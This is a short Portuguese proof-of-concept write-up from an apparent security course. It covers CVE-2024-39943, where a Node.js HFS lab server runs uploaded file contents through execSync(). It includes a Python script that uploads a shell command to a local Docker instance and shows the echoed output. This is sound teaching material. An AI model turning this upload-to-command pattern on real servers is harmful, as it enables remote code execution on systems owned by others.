
Exploit de prova de conceito para CVE-2024-39943, demonstrando execução remota de código via upload de arquivo em um servidor Node.js HFS usando child_process.execSync().
Escola WhiteHat 3ª turma – Noh Jeongmin (@JenmrR)
Em ambientes de servidor HFS baseados em Node.js, existe uma vulnerabilidade na qual o conteúdo de arquivos enviados é executado por child_process.execSync(). Um atacante pode executar comandos do sistema operacional diretamente através da funcionalidade de upload de arquivos, podendo visualizar resultados de comandos internos do servidor ou controlar o sistema. Esta é uma vulnerabilidade correspondente a CVE-2024-39943, que representa uma ameaça equivalente a injeção de comandos (Remote Code Execution).
/upload e executa o conteúdo do arquivo enviado diretamente como comando.$ sudo docker-compose up --build -d
$ python3 poc.py
import requests
payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }
r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)
Resposta do servidor após execução do PoC:
Executed:
Hello_From_Hacked_Server

execSync() causa riscos graves de segurança.